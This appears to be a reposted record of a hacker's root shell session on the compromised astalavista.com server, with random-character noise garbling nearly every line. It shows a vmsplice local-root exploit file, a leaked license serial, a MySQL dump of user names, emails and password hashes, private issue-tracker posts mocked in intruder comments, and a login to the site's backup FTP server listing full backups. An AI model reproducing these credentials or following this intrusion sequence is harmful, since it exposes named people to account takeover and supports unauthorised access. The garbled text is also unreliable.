drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..( M/ _8 l3 H8 n! {8 O) z% w
drwx—— 2 com com 4096 Jun 4 04:04 backups
+ t% X) M3 o0 w+ Z- p-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql0 O6 x$ T: t7 M. W5 H* m Q& m' x. u
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system- W G* L: j4 D. B: M" z1 X
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
/ r |: x$ G, n0 M) ?4 G& u/ w-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
; t9 u/ p- \4 x& O-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile9 d% a+ j# z, c# o
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc0 P( c3 f, F- M% N0 b
drwx–x–x 3 com com 4096 Jan 29 2008 domains
' h& _ E0 c1 ^. Y: [( N# N8 h* C-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
7 U+ X/ `! m! Q7 ]drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
% S0 d d4 d1 D- p% G e-rw——- 1 com com 69 Nov 18 2008 .lesshst+ U% W0 F% L( s( [1 V: h% m
drwx—— 2 com com 4096 Sep 24 2007 mail5 k" k S! t5 |. r
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
8 o5 ~0 ]' L2 Y+ p5 qdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
4 X3 k; G% @5 z, K" k* k9 olrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html4 H- t6 v% m3 r, H C
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
. b, w( D9 ~: P D6 w+ ddrwx—— 2 com com 4096 Aug 26 2008 .ssh$ d3 b7 R: }0 ~+ a& k, `& r
-rwx—— 1 com com 8515 Feb 10 2008 t
$ ?* D* `* G" Z: a8 o& W6 R-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c3 ?9 ~5 H+ O5 r$ R0 O
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp9 e4 J! X/ g. B# m
-rw-rw-r– 1 com com 617 May 20 2008 .toprc. Y- e) Z k' m
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
- w3 [( v" X+ R-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
3 K7 B1 g: b# U; M2 C8 s8 y$ z1 w-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
$ g' Z1 `2 w/ `7 Z" }8 v2 u; r3 D- x1 c8 Z% D: u
sh-3.2# head t.c
9 U! B& P$ Q( R( T2 X# X) k) A: _/*
( x2 B9 d. q' L) e, k6 b( v6 L* jessica_biel_naked_in_my_bed.c* a$ Y) J, i5 W/ A
*
- F2 G- P/ |# {4 L+ N* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.1 e' x B( U+ y3 i/ p9 }. J5 e. t
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
0 [/ y* h6 l- H# Z0 j* Stejnak je to stare jak cyp a aj jakesyk rozbite.) y' w9 i: H M8 N! Q
*
$ f9 d' L, f" u+ J4 ]$ k* Linux vmsplice Local Root Exploit3 t9 }; ?6 w/ \+ N6 [5 z
* By qaaz0 y% d1 k! g( N7 q8 o% X, p. W
*$ X7 A- U& G0 ^% v
- _: T H4 E8 C0 i4 c `8 i* v! p% csh-3.2# cd /0 t) E* |! \2 |& n/ Y6 g
sh-3.2# ls -la
0 W# ?: J M0 m! y8 Z$ \total 360
?9 }8 v& \" d/ u f6 N; Rdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
# u7 A' B1 D0 |' _1 t Udrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..( y+ g- y' K- l4 P0 D7 N5 {
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
$ d/ i( _* k3 J. A-rw——- 1 root root 10240 Jun 3 02:39 aquota.user, k: n+ X5 w( P" f6 J
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db' _% u% u" \9 D6 ?) Q& F/ }
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
/ B8 }' F& L, R1 z) I-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
0 M- S: Z5 Y8 g' ^7 jdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup4 M/ b# L6 j! j1 G* G: R, ]
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin. Q( C7 @, d' ]8 e
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot' s$ G- L& n* x% ^# b4 ?
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
/ j3 K: h: j8 p Ydrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc. U* y. v; m j8 x
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home( Z! v- ^5 I" X% `8 M
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf7 _$ P5 d$ u5 i: ]
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib" A7 G6 c7 d9 s2 v) F/ W" U% l
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
5 j) z2 y) ^$ X. Q7 K/ s$ {drwx—— 2 root root 16384 Sep 11 2007 lost+found
5 M8 l3 @/ ~* m: J- K, {+ vdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media* e* P% G# W) O. M/ `4 j* [! [+ @/ Y
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
7 n }, J0 ]0 M8 [drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt0 z; Q' P+ y1 x. J6 }" E( N8 t
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
1 ~' n' f" R* ]/ b0 D4 i5 l& ^* j0 Mdrwxr-xr-x 2 root root 0 Jun 3 02:43 net+ L5 [4 Q3 K3 q! \' y T" `- M' Y
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
$ y% _0 t% F+ m' Hdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc+ s0 d% `2 R% F0 g2 G% j8 }' G
drwxr-x— 15 root root 4096 Jun 4 08:40 root' q2 t' z# \% `# T% S
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin( Y' D, \" [( s6 P; N( D
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux8 T" x. G$ d3 F/ S
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
* M1 L* I: X) Cdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
1 y0 o; q7 ~! d+ t$ F' tdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
3 ?) }9 R. \6 `+ R: Idrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
- ]2 w( o6 o: C& I) D) N/ z. Adrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
* |+ P" L) R) {! s( f4 _" r9 r& J3 P* Q/ i
sh-3.2# cd opt+ _+ A- w9 @8 P2 ~7 s
sh-3.2# ls -la
/ M( w9 }7 t; k; J- X3 N7 h! btotal 20
8 A/ D3 u2 [7 r% y/ H, S, Zdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
/ q0 s: ^1 [: L& adrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
G6 o) w2 ?$ idrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
" {- ?1 n) u6 n0 W" ~8 N$ s
- ]6 y( q: x9 M2 ~+ K" v% ksh-3.2# cd lsws/
e7 H, C9 Z+ J5 o! Rsh-3.2# ls -la/ ~' j, }9 r# h' N3 s G( V9 t
total 1083 K7 a, t6 L0 f" D' z
drwxr-xr-x 15 root root 4096 Mar 20 2008 .; t1 j/ M1 H! Q3 V: L0 }
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
/ k: A: C$ J& V. Sdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons5 H8 K- q W( h# p
drwxr-xr-x 13 root root 4096 May 29 15:10 admin- K' I+ D0 q% z' A3 b
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
, q: L: N5 O5 F) L- ` P) Ldrwxr-xr-x 2 root root 4096 May 29 15:10 bin
1 n3 [9 Q. b1 |6 J7 h5 udrwx—— 4 apache apache 4096 Jun 3 02:43 conf4 d; Q8 x8 q' k9 z& z
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT$ ~' U, l( Q, o
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
]) m: s, N* d% j* wdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin2 f# ^9 a" Q* M. L
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
& R, r6 n/ z# ]& X/ x0 C, t" X$ U-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
- B4 A' t; w! |+ ]" x4 Z-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
+ m; @2 F A& ]( ?3 q: a* C-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
1 {# ?2 p3 i! ^1 W, i-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
# R, E: Q. t5 S1 _drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs/ I( z1 Q( y8 I4 K
drwxr-xr-x 2 root root 4096 Mar 20 2008 php
* v0 M' h! s& j" G4 X }9 P% Udrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild U* h# |+ j7 a4 c
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
* I3 ^. d: w% K% A9 w& o) Q-rw-r–r– 1 root root 6 May 29 15:10 VERSION- V1 T. I- W. r# e) S0 ^
# ^! B3 X! u: K, Y6 |6 k4 B. ash-3.2# cd conf6 |8 `8 ^7 w6 S1 r& |" T: U1 t
sh-3.2# ls -la$ E; K! a, k% ]4 Z P: n
total 48
H" e: B" |; o, ^drwx—— 4 apache apache 4096 Jun 3 02:43 .0 \/ j' S9 u/ j) n3 W
drwxr-xr-x 15 root root 4096 Mar 20 2008 ... B7 V5 Q4 @$ \8 g) c
drwx—— 2 apache apache 4096 Mar 20 2008 cert
+ @6 }4 [2 ]+ @# A n-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml8 `, ^* t$ u5 i8 J7 ?) h
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak' g, A' l3 U7 s/ y; ^: b! k7 W
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last7 k- W- N6 {, B0 p
-rw——- 1 apache apache 256 May 29 15:10 license.key: d' Q6 G5 C- q" n
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
$ K# W) ^" I& ^, [, f9 B-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
# w1 K; T2 a* b% `9 D5 [1 p2 T-rw——- 1 apache apache 20 May 29 15:10 serial.no
1 q' N2 v, n. z; q) X! c' _3 r/ }, `drwx—— 2 apache apache 4096 Mar 20 2008 templates
, x% d8 ~- @) F9 L: E- O9 x- S* w2 x$ ^ R! c5 b
sh-3.2# cat serial.no
& Q0 J3 V3 u* A3 j% |7 l" c7 ZIbDl-oVsO-CKqL-wVRa
) g' g& a! D2 J6 k# c7 \; x7 ^
8 \. t" c% t' |sh-3.2# mysql
/ e3 L( b7 ~* _( I- M/ ?Welcome to the MySQL monitor. Commands end with ; or \g.9 P6 C6 y" d: F0 S9 i5 A4 ?
Your MySQL connection id is 286844
9 H' H6 U z$ N, C% ]Server version: 5.0.45-community-log MySQL Community Edition (GPL)
: `9 M1 n7 q& w8 T- B" U' H: E& v/ S5 ~& |( W" d: T! b, Z
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.) I3 b7 m/ d; W9 F z) I5 {. k
$ I' j. c/ s4 w2 s7 A8 s7 Gmysql> show databases;: {( h: m$ h: J! E: S
+———————–+- v" I5 U0 k, V/ U7 L
| Database |
t) x9 u! l: w& e$ _: ~2 S) {6 Y+———————–+0 ]$ S- g9 Z6 |! C+ ~' E
| information_schema |) m: b+ w+ E' U$ W; g& u4 e' h$ g
| astanet_ads |
9 k/ c6 c! [0 z- Q# H| astanet_mailing_lists |
! T/ Y! N' v% S( }) m6 O/ |5 f| astanet_mediawiki |
1 L; Z7 L! g9 j: z* Y3 [| astanet_membersystem |
6 `( B% m. _+ `+ j+ E5 F| com_contrexx |5 D, E, n2 `) q, J+ _% n( f
| com_contrexx2 |
3 @- L8 U5 Y; _2 I& K9 b, j/ m6 Y| com_contrexx2_live |) X5 Q( q' N* N
| da_roundcube |
5 [0 b) A1 \9 y| dolphin |
, b' {/ t. k$ r# J9 x+ _| ideapool |
; j' Y; m# _4 O" Z; w* F4 G9 b| mysql |0 K/ o. `! d8 e s- O3 z
| test |
; X* D) J, x: |9 {| yourmaster |
& b2 n& K" o' |7 @& ~1 g2 X+———————–+
# F* l: z$ V- x" s14 rows in set (0.00 sec)
+ ]8 u0 s3 p$ O2 [$ k
9 Q3 {8 J- \! vmysql> use ideapool
% H: S& h: {8 t- @Database changed
* O4 ?) z0 b* tmysql> show tables;
, s, k6 H9 X, R# U8 N+———————————–+5 |) C1 x2 e2 g
| Tables_in_ideapool |( L/ E( o$ I/ x! z4 P
+———————————–+- ~. Y9 M, |; J0 @8 |8 U
| eventum_columns_to_display |' R: p' O7 f" S# k) D) w; | F
| eventum_custom_field |
' v- y. @6 |' `7 ]| eventum_custom_field_option |
; ^* H' I$ Z9 E6 D. E/ Z| eventum_custom_filter |
1 n8 Z( h- P; [' E| eventum_customer_account_manager |* D9 _* q) ^3 c
| eventum_customer_note |
6 h' E5 A2 a: g+ Y {| eventum_email_account |+ g- W, e4 J7 y; F; v* Y/ f) w4 R
| eventum_email_draft |+ Q: w5 {+ b/ [( X
| eventum_email_draft_recipient |* a' p$ q8 b% c2 |9 L5 d, o
| eventum_email_response |
9 h2 ^& ^$ ~6 H* t| eventum_faq |7 a4 k" m! M0 _
| eventum_faq_support_level |
# S7 I/ K' i3 j$ f# {, K| eventum_group |
$ Y2 g! @1 g0 k. c. n| eventum_history_type |$ @+ f+ c: t- M Y1 t
| eventum_irc_notice | z! e0 v( ~7 L$ r; R! h+ ~. b: [
| eventum_issue |
* c: u! w( \6 K| eventum_issue_association |
/ W/ j: O- C) K/ _' s| eventum_issue_attachment |
" e5 T) O9 r5 g; A& N| eventum_issue_attachment_file |
8 |# x! C" l8 @' z& E1 f| eventum_issue_checkin |
/ a" {6 { S) H, N- j; Z| eventum_issue_custom_field |0 F: L' C" `, }. y3 W8 C) T9 E
| eventum_issue_history |
) o8 S. R9 e* b3 C0 s| eventum_issue_quarantine |, q# Z' \: b$ @
| eventum_issue_requirement |( i/ f2 A" u$ z& h# m8 b% D, V
| eventum_issue_user |/ b. W% v) }- E9 s! @
| eventum_issue_user_replier |
3 E/ e( w' k( ~) F0 Y| eventum_link_filter |
) E% r2 _' C" u| eventum_mail_queue |) c; W8 c" n- b9 m
| eventum_mail_queue_log | M0 u2 D8 `5 z+ C3 k% X
| eventum_news |
% \+ h( y5 y; v& b& J+ g9 t| eventum_note |. A1 s. g0 t: V# f
| eventum_phone_support |5 e" o" S8 J! N! z' @$ t
| eventum_project |
( p3 [/ T. k3 K5 u, n: Y3 a( H% [! ?1 J* F| eventum_project_category |, m8 X9 m3 N8 I. R3 p5 y
| eventum_project_custom_field |$ \& ]6 I' E: `& Q! E/ c
| eventum_project_email_response |
) u. p. s, u2 i5 F" F9 R" c y| eventum_project_field_display |
( q0 ~; K$ s1 j/ G| eventum_project_group |
# i6 t( c& y h4 W) x+ F% t" J| eventum_project_link_filter | P6 M% }2 k- O0 ~" F: r% U
| eventum_project_news |, L/ h/ g A& t- n5 _; U6 A
| eventum_project_phone_category |, s8 e$ u: U# V/ n1 V
| eventum_project_priority |- U4 P, @3 D# z8 t: @
| eventum_project_release |
1 ]( M3 ~: V- P; v2 v| eventum_project_round_robin |% O1 V2 l6 k/ x- t
| eventum_project_status |- b' E5 o( y$ J
| eventum_project_status_date |$ Y+ |5 H: `) j! {
| eventum_project_user |
2 v% W, x$ m# w8 V4 Q" H| eventum_reminder_action |
! C9 h, a3 v" V* H- D, l| eventum_reminder_action_list |+ v: n1 g* E1 M& n
| eventum_reminder_action_type |
5 G' E' A1 Y* i* \% |- t| eventum_reminder_field |# K2 ?- K4 O1 d) O
| eventum_reminder_history |
% R& {. r2 _0 o+ y. c, Z! K| eventum_reminder_level |
7 b1 q- P* B0 L' X| eventum_reminder_level_condition |
; ?4 s3 t4 c. Z C| eventum_reminder_operator |0 V# O" ?7 J, y% Y* i5 \
| eventum_reminder_priority |9 w5 w3 ?6 m7 t! w
| eventum_reminder_requirement |: \0 N2 A& K) b* n& |
| eventum_reminder_triggered_action |
, c# X( J1 W% b$ g; X6 o, z: I, t| eventum_resolution |* M3 K9 U, ~4 L3 L; F
| eventum_round_robin_user |" E6 K5 T& l/ J1 U" f7 L
| eventum_search_profile |- J1 ^: g. A% `- o4 j: M
| eventum_status |( D5 S5 T$ \4 G; g0 u3 O
| eventum_subscription |
/ n2 h2 _: }% A0 q| eventum_subscription_type |2 @4 G, o9 H7 C5 ]5 B/ G3 Z
| eventum_support_email |8 X* Y- b$ q/ ~" e3 t$ Z) |
| eventum_support_email_body |3 Q: u+ E# F# X' B0 u
| eventum_time_tracking |! f: p% c% M5 @
| eventum_time_tracking_category |
6 W& H0 h# B, {* P| eventum_user |
( ?7 Y, O( T! y+ ^, }( B+———————————–+
+ L% H; _. X( _0 M& J9 X6 V1 l69 rows in set (0.00 sec)5 z% G. h6 @2 h+ j% r) \
$ c; l! ^* q: W6 M' {1 F) dmysql> describe eventum_user;
2 [6 m h1 O* Q4 o G+————————-+——————+——+—–+———————+—————-+6 j& Q* J. T) B$ x% [
| Field | Type | Null | Key | Default | Extra |
( a' [" F+ [, O+————————-+——————+——+—–+———————+—————-+, D m1 c6 f1 S {! l! {9 F
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |1 e" R. H/ t8 [' L' X p
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
) p$ D! R& p# G| usr_customer_id | int(11) unsigned | YES | | NULL | |: X0 M f1 k* M4 ~+ j) M
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
4 `3 S% I$ r8 q| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
7 w' Q- T. P# z, ?! \6 U4 @| usr_status | varchar(8) | NO | | active | |; m2 f% f' {% W! P* c. Z
| usr_password | varchar(32) | NO | | | |
) u( a/ ?3 ~1 R+ w7 g8 F) g4 l, `| usr_full_name | varchar(255) | NO | | | |8 o9 k: s$ _- J. j$ A# k
| usr_email | varchar(255) | NO | UNI | | |! s; o& w& |! d" m6 r& M7 p5 S
| usr_preferences | longtext | YES | | NULL | |
) p7 C3 M2 B& t/ p| usr_sms_email | varchar(255) | YES | | NULL | |
9 V: \ Z; D4 T5 Z1 W| usr_clocked_in | tinyint(1) | YES | | 0 | |" ^& L( e! D0 _, f; X
| usr_lang | varchar(5) | YES | | NULL | |
! |8 H& z+ q; v- y, H+————————-+——————+——+—–+———————+—————-+/ ]9 v0 ]) N) G3 x3 v
13 rows in set (0.00 sec)2 ]/ a7 O4 s( \
1 |$ j& B4 j: m9 J/ s/ C4 vmysql> select usr_full_name,usr_email,usr_password from eventum_user;6 ^; E- Y% d, c. t
+———————-+——————————-+———————————-+2 L4 r! N" g5 N( e
| usr_full_name | usr_email | usr_password |
G2 w; R# G1 B u# `+———————-+——————————-+———————————-+8 B8 _- V' H8 y2 v; e
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
+ p9 B* A# `: v4 Q4 f6 v| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |1 B1 N, S0 M+ T8 q) |7 j% E+ \
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
1 t: Y; L1 K# E| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |; `$ E0 c% K' `8 ~3 T) c
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
9 @$ u& e, t* t| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |# V1 c1 n5 d: z7 T- a7 s
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
* C. `7 ^6 C+ f| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
4 T2 Q5 b. Y4 y% B. X| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
% ?+ h R) j2 T% ~8 @| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |% N4 w$ [; _% T4 Z+ [
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |! a1 r2 a# t8 g6 u/ w% Q
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
; Q# u' v; Q6 ^, n) C Z| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
) z' V" ?7 v# \ ^, h5 L3 @& u| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |% ?2 e1 T+ J) _
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |3 f! J* t" @" l* I; L4 ^! Z
+———————-+——————————-+———————————-+* a# j# }8 B. U7 G! A
15 rows in set (0.00 sec)- V4 K' E* i1 P2 j* X9 p
0 W8 N0 V4 F" g' u6 F$ V4 Q8 imysql> select iss_description from eventum_issue where iss_id = 43;* E2 g7 s4 ]$ m. ~. \
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
. r5 {" w! w, X/ X, w4 x$ k| iss_description $ s2 R" a* T6 @8 {: n
|% M" `0 Y. Y# m* W$ _ w) l
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
. k5 w! }3 p# |5 s( M| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be$ M- B( r$ a" j# Q
connected for 90 mins… 120mins… so what i propose is something like:+ d& C* o) i0 C. E2 d
链接标记[url]http://www.surfthechannel.com/[/url]; ^- W5 }6 k9 e: Z7 K
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
: d" W& \, V4 [like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t% J: I' R+ k* B$ h4 G9 l
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off2 [. G+ k/ [) n, I& n
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
! V# h' E6 N+ `) |- b' C
6 R) }3 m1 f9 W0 L) h; [& E* EWe could also put advertisement during play on the flash video player itself… extra $$…, c% A3 g3 X. K7 k- j* H. o
& E% {, H: u; P1 a* I% M& ]) n. D
By sykadul |
3 W6 f. A' W! s2 Z0 [) i# l+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
$ D5 Q- Q+ @6 M: g& l% t1 row in set (0.00 sec)
4 u. r2 m2 }" L# w7 V, v- e( D9 r
4 E. r3 S, A3 o- p; }8 t& \// Money and extra $$ is all they care about. remember that.
: K6 ?( f- S# l* y) @
# i. l3 N2 b" |7 B' @mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;$ B8 T% K- u) I, R: j
+————————+——————————————————————————————————————————————————————————————————————————————-+: f+ H6 [. F) a& _0 I! u
| iss_summary | iss_description 4 K, m, `4 |! }; q* u8 j
|
# J) v4 B# Q5 [+ Z! M# y0 t$ I+————————+——————————————————————————————————————————————————————————————————————————————-+
* b I5 R7 J7 M* Q! X: `| Forum for REAL EXPERTS | Hello,
! ^# [7 J! C" x% L% [( I$ b2 U
$ L8 Z+ T5 @/ u2 ?! CIshtus and I,
. J, P6 M& m) ~2 F/ N$ }! ^( k* X
& _2 o; z g6 C: [& [/ r qCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide7 q4 W) B6 S+ p" C+ m# L
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..& U: Y4 `) d1 G" m1 B
3 ~, S: J$ p2 x; ]0 k
One example a friend of mine from coresecurity.com!$ X" ]$ H: R, Y1 E6 m6 n% x
* y$ l. b% r) ?8 P* q0 qWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
9 R& e0 u* \3 |! x" h" ^* H) }, W* _7 g8 g2 A
|
3 ~6 }/ q; |' }7 O3 ^" T+————————+——————————————————————————————————————————————————————————————————————————————+$ Y; P$ z' A0 d3 k
1 row in set (0.00 sec)6 m p0 \9 ]- d+ g! |& w
2 u4 O$ G# G: \' k4 n/ i2 V// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
& d4 P' z+ G6 l0 ?; K% j3 Z6 {( f' D! e' a3 n' P
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;$ Y/ ]5 W# K6 Q5 f0 x9 I
+——————+———————————————————————————————+
* s. Q+ Z0 C" C! ^. u| iss_summary | iss_description |
" D* n- r+ k9 l" v3 ?6 l% k: J3 _$ ^3 L+——————+———————————————————————————————+
& b$ q% M5 [- c+ v. I! v* }, c| Website guidance | Virtual Girl which guides you trought the website./ e3 u0 @! G3 s9 v% e/ ]1 [
1 ?) N+ n; \0 g6 q: D) H
We need a girl with who you can ( talk )!!! J' w$ d {: G2 P6 @
Also for the News!
! |3 ^& n. `; R* ISo my suggestion is a girl who read you the news loud if you like!
0 \( |3 o! y- k2 `2 Dyou can choose between read yourselfe or she read it for you or both! d. v2 U3 _7 @
3 S5 {$ n2 q2 u* D3 O* f4 N! _& d
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!( j, I$ D3 m. n! t ~
9 B( z# v$ C: B( K: ~& S4 x1 p
Have a look on the example girls!!2 A. l, c( }7 q' B" J7 G
* a0 r7 y0 t3 N' ^: P! L
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]' _/ A( _/ R# E3 z" |& Q
1 O( |+ x$ ~9 D; s: a
or that
; ^, J) m- [) q! g* N
( p& g) g+ D8 ]3 b链接标记[url]http://www.yellostrom.de/[/url]
; X! L5 s* ?8 ?; o, U5 b7 B- t4 G
4 Y1 \0 F6 L3 B% Q4 N|( s1 J" I+ q; g2 ]# O& K# @. Z
+——————+———————————————————————————————+
% ~% D- J) i; H- B. Z6 h7 @& m' j1 row in set (0.00 sec)( P5 k' |! C* A! n
8 q( g' {7 c/ G. V// ha ha.
! Y7 b+ m; A* K% @$ J% I: `
' U0 n8 D# V6 R0 {" h, b! Wmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
" F9 S3 Y" ~6 M0 V5 F+————————–+———————————————————————————————————–+. ?/ x+ R( k6 e- c P/ W+ W2 w
| iss_summary | iss_description |
# s6 b0 e5 |5 A+ n" g+————————–+———————————————————————————————————–+
, i5 I- E* t5 |: n| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |3 m& o- s7 H6 d* \
+————————–+———————————————————————————————————–+1 d' I+ ^ E4 j% Z* ^# P
1 row in set (0.00 sec), o4 U n% j# |! p% Z/ f% A5 K- K
* P( F, b' c4 l: N, U// LOL.0 O* {- h% i4 b3 V
* m: u. w3 p2 E# K3 l
mysql> exit
8 B* T$ S3 e% W0 v, B) pBye d5 w9 {; V2 ]- f8 x- |
# U r( ]4 a- K) D/ u1 jsh-3.2# ftp 212.254.194.163
$ q& `$ r6 h! N% S8 {Connected to 212.254.194.163.
7 \5 x4 b# {8 S. U" @* O220 BackupCOM_VW FTP server ready.
4 b' ^5 z! l9 O504 AUTH: security mechanism ‘GSSAPI’ not supported.! @3 ~, {: v ~
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.8 h% M% s' @; Q/ V, U9 u9 U
KERBEROS_V4 rejected as an authentication type; ~9 p, @7 g$ G2 Z5 q
Name (212.254.194.163:root): astalavista.com
7 o& Y. u- }1 i* {331 Password required for astalavista.com.4 D; _- i, U- y. h
Password:
+ g X. ?+ A8 x% q& T9 Y" `7 W230 User astalavista.com logged in., m" E { @, \7 L
Remote system type is UNIX.8 K, r% e% Z- }- X+ `1 `
Using binary mode to transfer files.
: {% ]" D- A' f# h# h% L2 vftp> ls -la. \' }: [& j* K& _1 r
227 Entering Passive Mode (212,254,194,163,2,188)4 v/ K. n* R. q: {$ }3 ]9 r
150 Opening BINARY mode data connection for ‘file list’.
6 o- Z2 ]& E0 z, {dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com3 A1 Z6 x: G' D; r# r
226 Transfer complete.; f$ d: b8 K/ O
ftp> cd astalavista.com* M2 `0 R- x+ _6 z
250 CWD command successful.3 n6 d, s1 o, @
ftp> ls -la9 x9 V2 ^1 S( z- X9 \
227 Entering Passive Mode (212,254,194,163,2,189); N5 r/ j: _; D9 U6 O8 P' s: ^
150 Opening BINARY mode data connection for ‘file list’.
4 x0 }6 Y+ F4 P* [, u- T; D-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar' R) Q+ B% s2 h! H0 t) J
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2* Q6 A N: u9 ?% o/ W
